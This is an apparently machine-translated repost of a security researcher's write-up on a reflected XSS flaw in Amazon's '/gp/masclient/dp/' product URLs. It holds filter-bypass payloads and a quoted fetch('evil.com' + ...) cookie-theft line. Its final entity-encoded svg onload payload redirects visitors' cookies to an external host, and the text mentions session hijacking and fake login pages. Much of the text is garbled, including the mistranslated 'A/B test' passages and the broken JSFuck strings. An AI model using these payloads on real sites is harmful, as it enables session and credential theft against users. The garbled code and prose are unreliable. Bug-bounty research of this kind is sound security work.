Shulou(Shulou.com)05/31 Report--

Today, I will talk to you about the example analysis of finding reflective XSS vulnerabilities on Amazon, which may not be well understood by many people. in order to make you understand better, the editor has summarized the following content for you. I hope you can get something according to this article.

I have always been interested in the way goods are displayed on Amazon. For example, what is the design architecture of this display? How do they achieve a good user experience? These can be learned a little from Amazon's Athumb B test strategy, but they can't find their specific site architecture test design.

Ahand B test is a new web page optimization method, which can be used to increase the conversion rate, registration rate and other web page indicators. To put it simply, the App/H5/ B test is a data decision method used to improve the conversion rate of App/H5/ Mini Program products and optimize the customer acquisition cost. For Internet products, more and more attention has been paid to improve the click conversion rate and optimize the customer acquisition cost through the Astroke B test.

APP Security Test Amazon Shopping APP

One way to look at Amazon's architectural design is to learn about its shopping APP. One rainy Friday afternoon, I decided to decompile Amazon's Android APP to see what the code looked like. The general steps are as follows: download the APK file, use some online decompiler to extract the code, and check the URL links and product pages involved in the different files.

Find links to product pages

Usually, Amazon product page links contain the word'/ dp/'', something like this: https://www.amazon.com/gp/masclient/dp/, so I simply perform a'/ dp/' field search:

Masclient product page

I checked a lot of product pages URL, but I didn't see the product page URL that contains' masclient' 'like the following figure:

Https://www.amazon.com/gp/masclient/dp/B00Q7LTUK

Oh, this seems to be a custom product page using internal applications. Change the product id to something else and see how it will react. Well, this seems to be a bit of a trick, the product id is not properly checked during URL parsing, and it is all capitalized (TEST), so let's see what happens if we inject HTML code. Just try scrolling the HTML tag of the content:

Https://www.amazon.com/gp/masclient/dp/%3Cmarquee%3E%3Ch2%3Ehi%20mom!

Oh, great! URL parses seven different fields, one of which is in the script tag:

The problems faced by

Input will be capitalized

So javascript functions like alert are escaped to ALERT, thus invalidating. Fortunately, some people have avoided this uppercase escape in the XSS vulnerability mining of Yahoo.com websites. The solution is as follows: first convert plain text characters into HTML entity characters, then encode them with URL, and finally output them with the onload parameter marked by SVG, in a format like this:

Closed tags like this are not available

It will give a 404 error response when it encounters a closed tag, so it is impossible to load our javascript file in this way. The solution is this: use javascript injection in the DOM tag, or execute it directly using the vector in the link script, like this, we can add "}'> a few characters like this to break the limit, and the final URL link will look like this:

Https://www.amazon.com/gp/masclient/dp/'}");}JAVASCRIPTHERE;{("

Due to the problem of uppercase escape, we consider using jsfuck code to transform the javascript code into characters in the form of! () + []. For example, the URL that responds to the debugger function is converted by jsfuck like this:

Https://www.amazon.com/gp/masclient/dp/'%7D"); % 7D [] [! [] + [+ []] + ([! []] + [] [[]) [+ []] + [+ []] + (! [] + []) [! [] + [! []) [! [] + [! []) [! [] +! []] [([] + [[]) [(!] + []) [+ [] + []] ]) [+! [] + [+ []] + (! []) [! [] +! []] + (! [] + [! []) [! [] +!! []]) [! [] +! [] +!! []] + (!! [] + [! []) [(! [] + []) [+ `.

If there is no limit to the length of URL, the cookie theft code fetch ("evil.com" + [xss_clean]) can be successfully injected using this technique, and the URL length of this kind of cookie theft will be more than 8000 characters.

URL link length limit

According to my tests, Amazon pages stop responding as long as the URL is more than 3500 characters long, so we don't seem to be able to take advantage of this JSFuck coding technology if we want to achieve cookie theft here. But in the reddit community, some people suggested that jjencode coding could be used, but I tested it and found that this $symbol didn't seem to be parsed properly in the end.

JSFuck: an alternative programming style based on JavaScript that uses only six different characters ([,], (,),!, +) to write and execute code. It doesn't depend on browsers, so you can even do it in Node.js. Run it on the, the converted code uses only 6 characters, and the function is the same as the pre-conversion code.

Warning from Chrome browser XSS Auditor

Versions of Chrome browsers after 67.0.3396.62 will actively identify and block XSS attacks and throw ERR_BLOCKED_BY_XSS_AUDITOR response errors. To complete the verification test, I used the Firefox (60.0.1) browser without built-in ss auditor.

Final XSS PoC attack in Firefox

With the analysis of the above issues, here I have constructed an Amazon URL link that allows visitors to redirect to another external URL link and implement a stolen display of the visitor's cookie in that external link. Since all visitors' browsing to Amazon will be recorded by this link, I will eventually be able to steal Amazon's session. In addition, I can also add a fake Amazon login interface to indirectly steal the user name and password information of the visiting user.

The final Payload used

Test links:

Https://www.amazon.com/gp/masclient/dp/%22%7D%27%3E%3Csvg%20onload%3D%26%23x77%3B%26%23x69%3B%26%23x6E%3B%26%23x64%3B%26%23x6F%3B%26%23x77%3B%26%23x2E%3B%26%23x6C%3B%26%23x6F%3B%26%23x63%3B%26%23x61%3B%26%23x74%3B%26%23x69%3B%26%23x6F%3B%26%23x6E%3B % 26%23x2E%3B%26%23x72%3B%26%23x65%3B%26%23x70%3B%26%23x6C%3B%26%23x61%3B%26%23x63%3B%26%23x65%3B%26%23x28%3B%26%23x27%3B%26%23x68%3B%26%23x74%3B%26%23x74%3B%26%23x70%3B%26%23x73%3B%26%23x3A%3B%26%23x2F%3B%26%23x2F%3B%26%23x73%3B%26%23x33%3B % 26%23x2D%3B%26%23x65%3B%26%23x75%3B%26%23x2D%3B%26%23x77%3B%26%23x65%3B%26%23x73%3B%26%23x74%3B%26%23x2D%3B%26%23x31%3B%26%23x2E%3B%26%23x61%3B%26%23x6D%3B%26%23x61%3B%26%23x7A%3B%26%23x6F%3B%26%23x6E%3B%26%23x61%3B%26%23x77%3B%26%23x73%3B % 26%23x2E%3B%26%23x63%3B%26%23x6F%3B%26%23x6D%3B%26%23x2F%3B%26%23x70%3B%26%23x65%3B%26%23x6E%3B%26%23x74%3B%26%23x65%3B%26%23x73%3B%26%23x74%3B%26%23x69%3B%26%23x6E%3B%26%23x67%3B%26%23x2D%3B%26%23x74%3B%26%23x61%3B%26%23x72%3B%26%23x67%3B % 26%23x65%3B%26%23x74%3B%26%23x2F%3B%26%23x78%3B%26%23x73%3B%26%23x73%3B%26%23x31%3B%26%23x2E%3B%26%23x68%3B%26%23x74%3B%26%23x6D%3B%26%23x6C%3B%26%23x3F%3B%26%23x63%3B%26%23x6F%3B%26%23x6F%3B%26%23x6B%3B%26%23x69%3B%26%23x65%3B%26%23x3D%3B % 26%23x27%3B%26%23x2B%3B%26%23x65%3B%26%23x73%3B%26%23x63%3B%26%23x61%3B%26%23x70%3B%26%23x65%3B%26%23x28%3B%26%23x64%3B%26%23x6F%3B%26%23x63%3B%26%23x75%3B%26%23x6D%3B%26%23x65%3B%26%23x6E%3B%26%23x74%3B%26%23x2E%3B%26%23x63%3B%26%23x6F%3B % 26%23x6F%3B%26%23x6B%3B%26%23x69%3B%26%23x65%3B%26%23x29%3B%26%23x29%3B%3E

URL encoded links:

Https://www.amazon.com/gp/masclient/dp/"}'>

HTML entity character converted link:

Https://www.amazon.com/gp/masclient/dp/"}'>

The link to alert (1) pops up in the Chrome browser (again using JSFuck encoding):

Https://www.amazon.com/gp/masclient/dp/'%7D%22); % 7D [] [(! []) [+ []] + ([! []] + [] []) [+! [] + [+ []] + (! [] + [! []) [+ []] + [! [] + [! []) [! [] + [[]) [! [] + []) [! [] + []) ! []] [+ (+!! [] + [+ ([] [] [[! [] + []) [+ []] + [] []]) [+! [] + [+ []] + (! [] + [! []) [! [] +! []] + (!! [] +) [+ []] + (!!] + []) [! [] + [! [] + [!] +! []] + (! [] + []) [+ [[]]) [+ []]) + [+ []]) + [! [] + [+ []] + [[]] + [[]]) [+ [[]]) [+ []] + [+ []] + (! [] + []]) [! [] +! [] + []] + [+ []] + (!! [] + []) [! [] +! []] + (! [] + []) [+! []]) [+! [] + [+ [] + (!! + + ([] [! [] + [[]) [+ []]) [+ [[]] + [[]]) [+ [] + [+ [] + [! []) [! []] ] +!! []] + (!! [] + []) [+ []) [! [] + [! [] + [+! [] + []) [+ []] + [[! [] + []) [+ [] + [[]]) [+ []] + [[] + (! [] + []) [! [] + []] + (! [] + []) [+ []] + [! []) [! [] + [! [] + [+! []]) [+!! []]) [+! []] + [+!! [] + ([]] + [] + [] + (! []) []) [! [] +! [] +! []] + (! [] + []) [+ []] + [! []) [+ []] + [+ []) [+ []] + [+ (+!! []) + [+ [[]]) [+ [[]]) [+ []] + [[] + [[]]) [+ []]) [+! []] + [[] + [! [] +! []] + (! [] + []) [+ []] + (! [] + [] +! []] + (!! [] +) [+! []]) [+! []] + [+ []]) + [+ []]) + [! []] ([! []] + [] [[]]) [+! [] + [+ [] + [! [] + [! []) [+ []] + [! []) [! [] +! [] +! []] + (!! [] + []) [+! []] + (!! [] + [+ []) [! + + ([] [] [[! [] + []) [+ [] + []] + [! [] + [+ [] + [! [] + [! []) [! [] +! []] + [! [] + [!]] + [! [] + [! []) [+ []] + [! []) [! [] + [] +! []] + (! [] + []) [+! []] + []) [+ []] + [+ []) [+ []] + [! [] + [[]]) [+! [] + [[]] + [+ []] + (! []) + (! []) [! [] + [! []] + (!! [] + []) [+ [] + (!! []) []) [! [] +! [] +! []] + (! [] + []) [+! []]) [+! [] + [+! [] + (!! []) [+!! [] (!! [] + [+! []) [+! []] + [! [] + [! []) [! [] + []) [+ []] + ([] [[]] + []) [+ []] + (! []) [! []) [+! []] + (+ (+) []]) [+! []] + [+ (+) [[!] + []) [+ [] + [! []) [+ [] + [[]] + [[]]) [+ [] []]) [+ [] (! [] + [] +! []] + (! [] + []) [+ []] + [! [] + [! [] + [[]) + [+ []) [+ []) [+ []]) + [+ []]) [+ []] + [] + [] ) [+! [] + [+ []] + (! []) [! [] + [! []) [+ []] + [! [] + [! []) [! [] +! [] + [! []] + (!! []) [+! []]) [+! []]) [+!! []]) [+! [] + [+! [] + (! []) [+] !! []] + (! [] +! []) [! [] + [] + []) [! [] + [] +! [] + (!! [] + [+! []) + (!! [] + [+ []) () (+! []) 7B (22)

To conduct a rigorous security review of internal APP applications, sometimes a single parameter can lead to serious security vulnerabilities. XXS payload can also bypass some restrictions by obfuscating coding and pose a security threat.

After reading the above, do you have any further understanding of the example analysis of finding reflective XSS vulnerabilities on Amazon? If you want to know more knowledge or related content, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.